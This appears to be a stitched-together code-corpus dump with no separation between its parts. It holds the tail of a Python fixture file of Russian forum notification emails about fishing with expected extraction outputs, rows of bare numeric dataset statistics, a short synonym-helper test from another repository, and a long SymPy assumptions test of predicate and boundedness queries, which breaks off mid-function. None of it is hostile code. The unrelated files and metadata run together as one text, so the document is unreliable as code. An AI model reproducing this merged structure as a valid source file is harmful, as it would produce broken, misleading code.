broken2 = """Ответ в теме 'Рыбалка на озерах и ставках' dimon777 только что ответил в теме, на которую Вы подписались, - Рыбалка на озерах и ставках - в разделе Охота и рыбалка Одесский форум.
"""
# Variant of source3 with the tilde-delimited unsubscribe footer missing.
broken3 = """
Ответ в теме 'Рыбалка на озерах и ставках'
Уважаемый(ая) VinsT,
dimon777 только что ответил в теме, на которую Вы подписались, - Рыбалка на озерах и ставках - в разделе Охота и рыбалка Одесский форум.
Эта тема расположена по адресу:
http://forumodua.com/showthread.php?t=1548612&goto=newpost
Размещенное сообщение:
***************
Вот нашел еще один интересный водоем на просторах и-нета Чистоводное в Белгород-Днестровском районе https://www.youtube.com/watch?v=7wJEKTmW1pE
Может кто был там, поделитесь инфой.
***************
С наилучшими пожеланиями,
Одесский форум
"""
# Presumably the expected extraction for broken3: the sign-off is kept because
# no footer follows it — TODO confirm which source this result pairs with.
result4 = """dimon777 только что ответил в теме, на которую Вы подписались, - Рыбалка на озерах и ставках - в разделе Охота и рыбалка Одесский форум.
Эта тема расположена по адресу:
http://forumodua.com/showthread.php?t=1548612&goto=newpost
Размещенное сообщение:
***************
Вот нашел еще один интересный водоем на просторах и-нета Чистоводное в Белгород-Днестровском районе https://www.youtube.com/watch?v=7wJEKTmW1pE
Может кто был там, поделитесь инфой.
***************
С наилучшими пожеланиями,
Одесский форум"""
# Like source1, but "Перейти к сообщению" appears on its own line instead of
# trailing the quoted reply.
source5 = """
Тилигульский лиман
Одесский Клуб Рыболовов Здравствуйте, VinsT!
мирон 2 опубликовал комментарий в тему, Тилигульский лиман
мирон 2 опубликовал(а): 14 часа назад, Ігор сказал:
Можно связывать канатом использованые шины и притапливать в лимане. Их быстро освоят мидии и другие жители лимана.
А с экологией как?
Перейти к сообщению
Одесский Клуб Рыболовов Вы получили это письмо, потому что вы подписаны на Тема "Тилигульский лиман".
Отказаться от получения этих писем? Отписаться или Настройка уведомлений .
Одесский Клуб Рыболовов, одесса, одесса, одесса, 65000
"""
# Expected extraction for source5 (same text as result1).
result5 = """Одесский Клуб Рыболовов:
Тилигульский лиман
мирон 2 опубликовал(а): 14 часа назад, Ігор сказал:
Можно связывать канатом использованые шины и притапливать в лимане. Их быстро освоят мидии и другие жители лимана.
А с экологией как?"""
| 36.110429
| 192
| 0.766395
| 817
| 5,886
| 5.514076
| 0.237454
| 0.031964
| 0.055938
| 0.035516
| 0.91232
| 0.896115
| 0.896115
| 0.896115
| 0.88879
| 0.88879
| 0
| 0.028763
| 0.137615
| 5,886
| 162
| 193
| 36.333333
| 0.858747
| 0.003568
| 0
| 0.731481
| 0
| 0.111111
| 0.962988
| 0.020638
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
f8e59d2b8f414a2a0e880f95b984373c6e0bd6df
| 171
|
py
|
Python
|
tests/utils/test_helper_synonym.py
|
alphagov-mirror/govuk-entity-personalisation
|
a674bca4c15691fe2c4e32ea213dfccf3cb0e8ec
|
[
"MIT"
] | 1
|
2021-02-15T17:35:59.000Z
|
2021-02-15T17:35:59.000Z
|
tests/utils/test_helper_synonym.py
|
alphagov-mirror/govuk-entity-personalisation
|
a674bca4c15691fe2c4e32ea213dfccf3cb0e8ec
|
[
"MIT"
] | 16
|
2020-11-30T14:41:31.000Z
|
2021-09-09T15:33:46.000Z
|
tests/utils/test_helper_synonym.py
|
alphagov-mirror/govuk-entity-personalisation
|
a674bca4c15691fe2c4e32ea213dfccf3cb0e8ec
|
[
"MIT"
] | 4
|
2020-12-14T17:36:31.000Z
|
2021-04-10T20:12:46.000Z
|
from src.utils.helper_synonym import get_synonym_all
def test_get_synonym_all(terms_synonyms):
    """get_synonym_all should map every requested term to its known synonyms."""
    expected = terms_synonyms
    actual = get_synonym_all(terms=terms_synonyms.keys())
    assert actual == expected
| 28.5
| 73
| 0.830409
| 26
| 171
| 5.038462
| 0.538462
| 0.229008
| 0.29771
| 0.274809
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.093567
| 171
| 5
| 74
| 34.2
| 0.845161
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.333333
| false
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
f8fac0b04fde68dfb9b4133f0f134bf699bd57ba
| 63,245
|
py
|
Python
|
sympy/assumptions/tests/test_query.py
|
josephmisiti/sympy
|
683ccf471a826a75235694ae1ba3dd935d5c8e12
|
[
"BSD-3-Clause"
] | 1
|
2020-12-27T18:43:22.000Z
|
2020-12-27T18:43:22.000Z
|
sympy/assumptions/tests/test_query.py
|
josephmisiti/sympy
|
683ccf471a826a75235694ae1ba3dd935d5c8e12
|
[
"BSD-3-Clause"
] | null | null | null |
sympy/assumptions/tests/test_query.py
|
josephmisiti/sympy
|
683ccf471a826a75235694ae1ba3dd935d5c8e12
|
[
"BSD-3-Clause"
] | null | null | null |
from sympy.utilities.pytest import raises, XFAIL
from sympy.utilities.pytest import raises, XFAIL
from sympy.core import Symbol, symbols, S, Rational, Integer, I, pi, oo
from sympy.functions import exp, log, sin, cos, sign, re, im, sqrt, Abs
from sympy.assumptions import (global_assumptions, Q, ask,
register_handler, remove_handler, AssumptionsContext)
from sympy.assumptions.handlers import AskHandler
from sympy.assumptions.ask import (compute_known_facts,
known_facts_cnf, known_facts_dict)
def test_int_1():
    """Predicate profile of the plain Python integer 1 (note: composite is True here)."""
    z = 1
    checks = [
        (Q.commutative, True),
        (Q.integer, True),
        (Q.rational, True),
        (Q.real, True),
        (Q.complex, True),
        (Q.irrational, False),
        (Q.imaginary, False),
        (Q.positive, True),
        (Q.negative, False),
        (Q.even, False),
        (Q.odd, True),
        (Q.bounded, True),
        (Q.infinitesimal, False),
        (Q.prime, False),
        (Q.composite, True),
    ]
    for predicate, expected in checks:
        assert ask(predicate(z)) == expected
def test_float_1():
    """Predicate profiles of floats: 1.0 (integral) versus 7.2123 (non-integral)."""
    def verify(z, integer, odd, composite):
        # Only integer/odd/composite differ between the two literals.
        checks = [
            (Q.commutative, True),
            (Q.integer, integer),
            (Q.rational, True),
            (Q.real, True),
            (Q.complex, True),
            (Q.irrational, False),
            (Q.imaginary, False),
            (Q.positive, True),
            (Q.negative, False),
            (Q.even, False),
            (Q.odd, odd),
            (Q.bounded, True),
            (Q.infinitesimal, False),
            (Q.prime, False),
            (Q.composite, composite),
        ]
        for predicate, expected in checks:
            assert ask(predicate(z)) == expected
    verify(1.0, True, True, True)
    verify(7.2123, False, False, False)
def test_zero_0():
    """Predicate profile of Integer(0): even and infinitesimal, sign-less, not nonzero."""
    z = Integer(0)
    checks = [
        (Q.nonzero, False),
        (Q.commutative, True),
        (Q.integer, True),
        (Q.rational, True),
        (Q.real, True),
        (Q.complex, True),
        (Q.imaginary, False),
        (Q.positive, False),
        (Q.negative, False),
        (Q.even, True),
        (Q.odd, False),
        (Q.bounded, True),
        (Q.infinitesimal, True),
        (Q.prime, False),
        (Q.composite, False),
    ]
    for predicate, expected in checks:
        assert ask(predicate(z)) == expected
def test_negativeone():
    """Predicate profile of Integer(-1): a negative odd integer, neither prime nor composite."""
    z = Integer(-1)
    checks = [
        (Q.nonzero, True),
        (Q.commutative, True),
        (Q.integer, True),
        (Q.rational, True),
        (Q.real, True),
        (Q.complex, True),
        (Q.irrational, False),
        (Q.imaginary, False),
        (Q.positive, False),
        (Q.negative, True),
        (Q.even, False),
        (Q.odd, True),
        (Q.bounded, True),
        (Q.infinitesimal, False),
        (Q.prime, False),
        (Q.composite, False),
    ]
    for predicate, expected in checks:
        assert ask(predicate(z)) == expected
def test_infinity():
    """S.Infinity: positive and extended-real, but unbounded and not complex."""
    inf = S.Infinity
    checks = [
        (Q.commutative, True),
        (Q.integer, False),
        (Q.rational, False),
        (Q.real, False),
        (Q.extended_real, True),
        (Q.complex, False),
        (Q.irrational, False),
        (Q.imaginary, False),
        (Q.positive, True),
        (Q.negative, False),
        (Q.even, False),
        (Q.odd, False),
        (Q.bounded, False),
        (Q.infinitesimal, False),
        (Q.prime, False),
        (Q.composite, False),
    ]
    for predicate, expected in checks:
        assert ask(predicate(inf)) == expected
def test_neg_infinity():
    """S.NegativeInfinity: negative and extended-real, but unbounded and not complex."""
    neg_inf = S.NegativeInfinity
    checks = [
        (Q.commutative, True),
        (Q.integer, False),
        (Q.rational, False),
        (Q.real, False),
        (Q.extended_real, True),
        (Q.complex, False),
        (Q.irrational, False),
        (Q.imaginary, False),
        (Q.positive, False),
        (Q.negative, True),
        (Q.even, False),
        (Q.odd, False),
        (Q.bounded, False),
        (Q.infinitesimal, False),
        (Q.prime, False),
        (Q.composite, False),
    ]
    for predicate, expected in checks:
        assert ask(predicate(neg_inf)) == expected
def test_nan():
    """S.NaN: nonzero yet not even extended-real; every other predicate is False except commutative."""
    nan = S.NaN
    checks = [
        (Q.commutative, True),
        (Q.integer, False),
        (Q.rational, False),
        (Q.real, False),
        (Q.extended_real, False),
        (Q.complex, False),
        (Q.irrational, False),
        (Q.imaginary, False),
        (Q.positive, False),
        (Q.nonzero, True),
        (Q.even, False),
        (Q.odd, False),
        (Q.bounded, False),
        (Q.infinitesimal, False),
        (Q.prime, False),
        (Q.composite, False),
    ]
    for predicate, expected in checks:
        assert ask(predicate(nan)) == expected
def test_Rational_number():
    """Full predicate profile of Rational(3, 4), plus sign checks for other rationals."""
    r = Rational(3, 4)
    checks = [
        (Q.commutative, True),
        (Q.integer, False),
        (Q.rational, True),
        (Q.real, True),
        (Q.complex, True),
        (Q.irrational, False),
        (Q.imaginary, False),
        (Q.positive, True),
        (Q.negative, False),
        (Q.even, False),
        (Q.odd, False),
        (Q.bounded, True),
        (Q.infinitesimal, False),
        (Q.prime, False),
        (Q.composite, False),
    ]
    for predicate, expected in checks:
        assert ask(predicate(r)) == expected
    # positive and negative are mutually exclusive for every nonzero rational
    sign_cases = [
        (Rational(1, 4), True),
        (Rational(5, 4), True),
        (Rational(5, 3), True),
        (Rational(-3, 4), False),
        (Rational(-1, 4), False),
        (Rational(-5, 4), False),
        (Rational(-5, 3), False),
    ]
    for value, positive in sign_cases:
        assert ask(Q.positive(value)) == positive
        assert ask(Q.negative(value)) == (not positive)
def test_sqrt_2():
    """sqrt(2): a bounded, positive, irrational real number."""
    z = sqrt(2)
    checks = [
        (Q.commutative, True),
        (Q.integer, False),
        (Q.rational, False),
        (Q.real, True),
        (Q.complex, True),
        (Q.irrational, True),
        (Q.imaginary, False),
        (Q.positive, True),
        (Q.negative, False),
        (Q.even, False),
        (Q.odd, False),
        (Q.bounded, True),
        (Q.infinitesimal, False),
        (Q.prime, False),
        (Q.composite, False),
    ]
    for predicate, expected in checks:
        assert ask(predicate(z)) == expected
def test_pi():
    """Pi and rational combinations of it all share the positive-irrational profile."""
    irrational_profile = [
        (Q.commutative, True),
        (Q.integer, False),
        (Q.rational, False),
        (Q.real, True),
        (Q.complex, True),
        (Q.irrational, True),
        (Q.imaginary, False),
        (Q.positive, True),
        (Q.negative, False),
        (Q.even, False),
        (Q.odd, False),
        (Q.bounded, True),
        (Q.infinitesimal, False),
        (Q.prime, False),
        (Q.composite, False),
    ]
    # Same expectations for pi itself and several arithmetic combinations.
    for z in (S.Pi, S.Pi + 1, 2*S.Pi, S.Pi ** 2, (1 + S.Pi) ** 2):
        for predicate, expected in irrational_profile:
            assert ask(predicate(z)) == expected
def test_E():
    """Euler's number S.Exp1: a bounded, positive, irrational real."""
    e = S.Exp1
    checks = [
        (Q.commutative, True),
        (Q.integer, False),
        (Q.rational, False),
        (Q.real, True),
        (Q.complex, True),
        (Q.irrational, True),
        (Q.imaginary, False),
        (Q.positive, True),
        (Q.negative, False),
        (Q.even, False),
        (Q.odd, False),
        (Q.bounded, True),
        (Q.infinitesimal, False),
        (Q.prime, False),
        (Q.composite, False),
    ]
    for predicate, expected in checks:
        assert ask(predicate(e)) == expected
def test_I():
    """The imaginary unit and complex combinations: complex and bounded, never real."""
    I = S.ImaginaryUnit
    def verify(z, imaginary):
        # Only Q.imaginary distinguishes pure I from 1+I and I*(1+I).
        checks = [
            (Q.commutative, True),
            (Q.integer, False),
            (Q.rational, False),
            (Q.real, False),
            (Q.complex, True),
            (Q.irrational, False),
            (Q.imaginary, imaginary),
            (Q.positive, False),
            (Q.negative, False),
            (Q.even, False),
            (Q.odd, False),
            (Q.bounded, True),
            (Q.infinitesimal, False),
            (Q.prime, False),
            (Q.composite, False),
        ]
        for predicate, expected in checks:
            assert ask(predicate(z)) == expected
    verify(I, True)
    verify(1 + I, False)
    verify(I*(1 + I), False)
def test_bounded():
    """Propagation of Q.bounded through Add, Mul, Pow and elementary
    functions.

    Section labels use B for a term assumed bounded, U for a term assumed
    unbounded (~Q.bounded) and ? for a term with no boundedness assumption.
    A sum of unbounded terms is only known unbounded when sign information
    rules out cancellation.
    """
    x, y, z = symbols('x,y,z')
    assert ask(Q.bounded(x)) is None
    assert ask(Q.bounded(x), Q.bounded(x)) is True
    assert ask(Q.bounded(x), Q.bounded(y)) is None
    assert ask(Q.bounded(x), Q.complex(x)) is None
    assert ask(Q.bounded(x + 1)) is None
    assert ask(Q.bounded(x + 1), Q.bounded(x)) is True
    a = x + y
    # rebind x, y to the actual Add arguments so the assumptions below
    # attach to exactly the objects inside `a`
    x, y = a.args
    # B + B
    assert ask(Q.bounded(a), Q.bounded(x) & Q.bounded(y)) is True
    assert ask(Q.bounded(a), Q.bounded(x) & Q.bounded(y) & Q.positive(x)) is True
    assert ask(Q.bounded(a), Q.bounded(x) & Q.bounded(y) & Q.positive(y)) is True
    assert ask(Q.bounded(a), Q.bounded(x) & Q.bounded(y) & Q.positive(x) & Q.positive(y)) is True
    assert ask(Q.bounded(a), Q.bounded(x) & Q.bounded(y) & Q.positive(x) & ~Q.positive(y)) is True
    assert ask(Q.bounded(a), Q.bounded(x) & Q.bounded(y) & ~Q.positive(x) & Q.positive(y)) is True
    assert ask(Q.bounded(a), Q.bounded(x) & Q.bounded(y) & ~Q.positive(x) & ~Q.positive(y)) is True
    # B + U: always unbounded, whatever the signs
    assert ask(Q.bounded(a), Q.bounded(x) & ~Q.bounded(y)) is False
    assert ask(Q.bounded(a), Q.bounded(x) & ~Q.bounded(y) & Q.positive(x)) is False
    assert ask(Q.bounded(a), Q.bounded(x) & ~Q.bounded(y) & Q.positive(y)) is False
    assert ask(Q.bounded(a), Q.bounded(x) & ~Q.bounded(y) & Q.positive(x) & Q.positive(y)) is False
    assert ask(Q.bounded(a), Q.bounded(x) & ~Q.bounded(y) & Q.positive(x) & ~Q.positive(y)) is False
    assert ask(Q.bounded(a), Q.bounded(x) & ~Q.bounded(y) & ~Q.positive(x) & Q.positive(y)) is False
    assert ask(Q.bounded(a), Q.bounded(x) & ~Q.bounded(y) & ~Q.positive(x) & ~Q.positive(y)) is False
    # B + ?
    assert ask(Q.bounded(a), Q.bounded(x)) is None
    assert ask(Q.bounded(a), Q.bounded(x) & Q.positive(x)) is None
    assert ask(Q.bounded(a), Q.bounded(x) & Q.positive(y)) is None
    assert ask(Q.bounded(a), Q.bounded(x) & Q.positive(x) & Q.positive(y)) is None
    assert ask(Q.bounded(a), Q.bounded(x) & Q.positive(x) & ~Q.positive(y)) is None
    assert ask(Q.bounded(a), Q.bounded(x) & ~Q.positive(x) & Q.positive(y)) is None
    assert ask(Q.bounded(a), Q.bounded(x) & ~Q.positive(x) & ~Q.positive(y)) is None
    # U + U: unknown unless the signs forbid cancellation
    assert ask(Q.bounded(a), ~Q.bounded(x) & ~Q.bounded(y)) is None
    assert ask(Q.bounded(a), ~Q.bounded(x) & ~Q.bounded(y) & Q.positive(x)) is None
    assert ask(Q.bounded(a), ~Q.bounded(x) & ~Q.bounded(y) & Q.positive(y)) is None
    assert ask(Q.bounded(a), ~Q.bounded(x) & ~Q.bounded(y) & Q.positive(x) & Q.positive(y)) is False
    assert ask(Q.bounded(a), ~Q.bounded(x) & ~Q.bounded(y) & Q.positive(x) & ~Q.positive(y)) is None
    assert ask(Q.bounded(a), ~Q.bounded(x) & ~Q.bounded(y) & ~Q.positive(x) & Q.positive(y)) is None
    assert ask(Q.bounded(a), ~Q.bounded(x) & ~Q.bounded(y) & ~Q.positive(x) & ~Q.positive(y)) is False
    # U + ?
    assert ask(Q.bounded(a), ~Q.bounded(y)) is None
    assert ask(Q.bounded(a), ~Q.bounded(y) & Q.positive(x)) is None
    assert ask(Q.bounded(a), ~Q.bounded(y) & Q.positive(y)) is None
    assert ask(Q.bounded(a), ~Q.bounded(y) & Q.positive(x) & Q.positive(y)) is False
    assert ask(Q.bounded(a), ~Q.bounded(y) & Q.positive(x) & ~Q.positive(y)) is None
    assert ask(Q.bounded(a), ~Q.bounded(y) & ~Q.positive(x) & Q.positive(y)) is None
    assert ask(Q.bounded(a), ~Q.bounded(y) & ~Q.positive(x) & ~Q.positive(y)) is False
    # ? + ?
    assert ask(Q.bounded(a)) is None
    assert ask(Q.bounded(a), Q.positive(x)) is None
    assert ask(Q.bounded(a), Q.positive(y)) is None
    assert ask(Q.bounded(a), Q.positive(x) & Q.positive(y)) is None
    assert ask(Q.bounded(a), Q.positive(x) & ~Q.positive(y)) is None
    assert ask(Q.bounded(a), ~Q.positive(x) & Q.positive(y)) is None
    assert ask(Q.bounded(a), ~Q.positive(x) & ~Q.positive(y)) is None
    # three-term sums: exhaustive sweep over bounded/sign assumptions
    a = x + y + z
    x, y, z = a.args
    assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & Q.negative(y) & Q.bounded(y) & Q.negative(z) & Q.bounded(z)) is True
    assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & Q.negative(y) & Q.bounded(y) & Q.bounded(z)) is True
    assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & Q.negative(y) & Q.bounded(y) & Q.positive(z) & Q.bounded(z)) is True
    assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & Q.negative(y) & Q.bounded(y) & Q.negative(z) & ~Q.bounded(z)) is False
    assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & Q.negative(y) & Q.bounded(y) & ~Q.bounded(z)) is False
    assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & Q.negative(y) & Q.bounded(y) & Q.positive(z) & ~Q.bounded(z)) is False
    assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & Q.negative(y) & Q.bounded(y) & Q.negative(z)) is None
    assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & Q.negative(y) & Q.bounded(y)) is None
    assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & Q.negative(y) & Q.bounded(y) & Q.positive(z)) is None
    assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & Q.bounded(y) & Q.bounded(z)) is True
    assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & Q.bounded(y) & Q.positive(z) & Q.bounded(z)) is True
    assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & Q.bounded(y) & Q.negative(z) & ~Q.bounded(z)) is False
    assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & Q.bounded(y) & ~Q.bounded(z)) is False
    assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & Q.bounded(y) & Q.positive(z) & ~Q.bounded(z)) is False
    assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & Q.bounded(y) & Q.negative(z)) is None
    assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & Q.bounded(y)) is None
    assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & Q.bounded(y) & Q.positive(z)) is None
    assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & Q.positive(y) & Q.bounded(y) & Q.positive(z) & Q.bounded(z)) is True
    assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & Q.positive(y) & Q.bounded(y) & Q.negative(z) & ~Q.bounded(z)) is False
    assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & Q.positive(y) & Q.bounded(y) & ~Q.bounded(z)) is False
    assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & Q.positive(y) & Q.bounded(y) & Q.positive(z) & ~Q.bounded(z)) is False
    assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & Q.positive(y) & Q.bounded(y) & Q.negative(z)) is None
    assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & Q.positive(y) & Q.bounded(y)) is None
    assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & Q.positive(y) & Q.bounded(y) & Q.positive(z)) is None
    assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & Q.negative(y) & ~Q.bounded(y) & Q.negative(z) & ~Q.bounded(z)) is False
    assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & Q.negative(y) & ~Q.bounded(y) & ~Q.bounded(z)) is None
    assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & Q.negative(y) & ~Q.bounded(y) & Q.positive(z) & ~Q.bounded(z)) is None
    assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & Q.negative(y) & ~Q.bounded(y) & Q.negative(z)) is False
    assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & Q.negative(y) & ~Q.bounded(y)) is None
    assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & Q.negative(y) & ~Q.bounded(y) & Q.positive(z)) is None
    assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & ~Q.bounded(y) & ~Q.bounded(z)) is None
    assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & ~Q.bounded(y) & Q.positive(z) & ~Q.bounded(z)) is None
    assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & ~Q.bounded(y) & Q.negative(z)) is None
    assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & ~Q.bounded(y)) is None
    assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & ~Q.bounded(y) & Q.positive(z)) is None
    assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & Q.positive(y) & ~Q.bounded(y) & Q.positive(z) & ~Q.bounded(z)) is False
    assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & Q.positive(y) & ~Q.bounded(y) & Q.negative(z)) is None
    assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & Q.positive(y) & ~Q.bounded(y)) is None
    assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & Q.positive(y) & ~Q.bounded(y) & Q.positive(z)) is False
    assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & Q.negative(y) & Q.negative(z)) is None
    assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & Q.negative(y)) is None
    assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & Q.negative(y) & Q.positive(z)) is None
    assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x)) is None
    assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & Q.positive(z)) is None
    assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & Q.positive(y) & Q.positive(z)) is None
    assert ask(Q.bounded(a), Q.bounded(x) & Q.bounded(y) & Q.bounded(z)) is True
    assert ask(Q.bounded(a), Q.bounded(x) & Q.bounded(y) & Q.positive(z) & Q.bounded(z)) is True
    assert ask(Q.bounded(a), Q.bounded(x) & Q.bounded(y) & Q.negative(z) & ~Q.bounded(z)) is False
    assert ask(Q.bounded(a), Q.bounded(x) & Q.bounded(y) & ~Q.bounded(z)) is False
    assert ask(Q.bounded(a), Q.bounded(x) & Q.bounded(y) & Q.positive(z) & ~Q.bounded(z)) is False
    assert ask(Q.bounded(a), Q.bounded(x) & Q.bounded(y) & Q.negative(z)) is None
    assert ask(Q.bounded(a), Q.bounded(x) & Q.bounded(y)) is None
    assert ask(Q.bounded(a), Q.bounded(x) & Q.bounded(y) & Q.positive(z)) is None
    assert ask(Q.bounded(a), Q.bounded(x) & Q.positive(y) & Q.bounded(y) & Q.positive(z) & Q.bounded(z)) is True
    assert ask(Q.bounded(a), Q.bounded(x) & Q.positive(y) & Q.bounded(y) & Q.negative(z) & ~Q.bounded(z)) is False
    assert ask(Q.bounded(a), Q.bounded(x) & Q.positive(y) & Q.bounded(y) & ~Q.bounded(z)) is False
    assert ask(Q.bounded(a), Q.bounded(x) & Q.positive(y) & Q.bounded(y) & Q.positive(z) & ~Q.bounded(z)) is False
    assert ask(Q.bounded(a), Q.bounded(x) & Q.positive(y) & Q.bounded(y) & Q.negative(z)) is None
    assert ask(Q.bounded(a), Q.bounded(x) & Q.positive(y) & Q.bounded(y)) is None
    assert ask(Q.bounded(a), Q.bounded(x) & Q.positive(y) & Q.bounded(y) & Q.positive(z)) is None
    assert ask(Q.bounded(a), Q.bounded(x) & Q.negative(y) & ~Q.bounded(y) & Q.negative(z) & ~Q.bounded(z)) is False
    assert ask(Q.bounded(a), Q.bounded(x) & Q.negative(y) & ~Q.bounded(y) & ~Q.bounded(z)) is None
    assert ask(Q.bounded(a), Q.bounded(x) & Q.negative(y) & ~Q.bounded(y) & Q.positive(z) & ~Q.bounded(z)) is None
    assert ask(Q.bounded(a), Q.bounded(x) & Q.negative(y) & ~Q.bounded(y) & Q.negative(z)) is False
    assert ask(Q.bounded(a), Q.bounded(x) & Q.negative(y) & ~Q.bounded(y)) is None
    assert ask(Q.bounded(a), Q.bounded(x) & Q.negative(y) & ~Q.bounded(y) & Q.positive(z)) is None
    assert ask(Q.bounded(a), Q.bounded(x) & ~Q.bounded(y) & ~Q.bounded(z)) is None
    assert ask(Q.bounded(a), Q.bounded(x) & ~Q.bounded(y) & Q.positive(z) & ~Q.bounded(z)) is None
    assert ask(Q.bounded(a), Q.bounded(x) & ~Q.bounded(y) & Q.negative(z)) is None
    assert ask(Q.bounded(a), Q.bounded(x) & ~Q.bounded(y)) is None
    assert ask(Q.bounded(a), Q.bounded(x) & ~Q.bounded(y) & Q.positive(z)) is None
    assert ask(Q.bounded(a), Q.bounded(x) & Q.positive(y) & ~Q.bounded(y) & Q.positive(z) & ~Q.bounded(z)) is False
    assert ask(Q.bounded(a), Q.bounded(x) & Q.positive(y) & ~Q.bounded(y) & Q.negative(z)) is None
    assert ask(Q.bounded(a), Q.bounded(x) & Q.positive(y) & ~Q.bounded(y)) is None
    assert ask(Q.bounded(a), Q.bounded(x) & Q.positive(y) & ~Q.bounded(y) & Q.positive(z)) is False
    assert ask(Q.bounded(a), Q.bounded(x) & Q.negative(y) & Q.negative(z)) is None
    assert ask(Q.bounded(a), Q.bounded(x) & Q.negative(y)) is None
    assert ask(Q.bounded(a), Q.bounded(x) & Q.negative(y) & Q.positive(z)) is None
    assert ask(Q.bounded(a), Q.bounded(x)) is None
    assert ask(Q.bounded(a), Q.bounded(x) & Q.positive(z)) is None
    assert ask(Q.bounded(a), Q.bounded(x) & Q.positive(y) & Q.positive(z)) is None
    assert ask(Q.bounded(a), Q.positive(x) & Q.bounded(x) & Q.positive(y) & Q.bounded(y) & Q.positive(z) & Q.bounded(z)) is True
    assert ask(Q.bounded(a), Q.positive(x) & Q.bounded(x) & Q.positive(y) & Q.bounded(y) & Q.negative(z) & ~Q.bounded(z)) is False
    assert ask(Q.bounded(a), Q.positive(x) & Q.bounded(x) & Q.positive(y) & Q.bounded(y) & ~Q.bounded(z)) is False
    assert ask(Q.bounded(a), Q.positive(x) & Q.bounded(x) & Q.positive(y) & Q.bounded(y) & Q.positive(z) & ~Q.bounded(z)) is False
    assert ask(Q.bounded(a), Q.positive(x) & Q.bounded(x) & Q.positive(y) & Q.bounded(y) & Q.negative(z)) is None
    assert ask(Q.bounded(a), Q.positive(x) & Q.bounded(x) & Q.positive(y) & Q.bounded(y)) is None
    assert ask(Q.bounded(a), Q.positive(x) & Q.bounded(x) & Q.positive(y) & Q.bounded(y) & Q.positive(z)) is None
    assert ask(Q.bounded(a), Q.positive(x) & Q.bounded(x) & Q.negative(y) & ~Q.bounded(y) & Q.negative(z) & ~Q.bounded(z)) is False
    assert ask(Q.bounded(a), Q.positive(x) & Q.bounded(x) & Q.negative(y) & ~Q.bounded(y) & ~Q.bounded(z)) is None
    assert ask(Q.bounded(a), Q.positive(x) & Q.bounded(x) & Q.negative(y) & ~Q.bounded(y) & Q.positive(z) & ~Q.bounded(z)) is None
    assert ask(Q.bounded(a), Q.positive(x) & Q.bounded(x) & Q.negative(y) & ~Q.bounded(y) & Q.negative(z)) is False
    assert ask(Q.bounded(a), Q.positive(x) & Q.bounded(x) & Q.negative(y) & ~Q.bounded(y)) is None
    assert ask(Q.bounded(a), Q.positive(x) & Q.bounded(x) & Q.negative(y) & ~Q.bounded(y) & Q.positive(z)) is None
    assert ask(Q.bounded(a), Q.positive(x) & Q.bounded(x) & ~Q.bounded(y) & ~Q.bounded(z)) is None
    assert ask(Q.bounded(a), Q.positive(x) & Q.bounded(x) & ~Q.bounded(y) & Q.positive(z) & ~Q.bounded(z)) is None
    assert ask(Q.bounded(a), Q.positive(x) & Q.bounded(x) & ~Q.bounded(y) & Q.negative(z)) is None
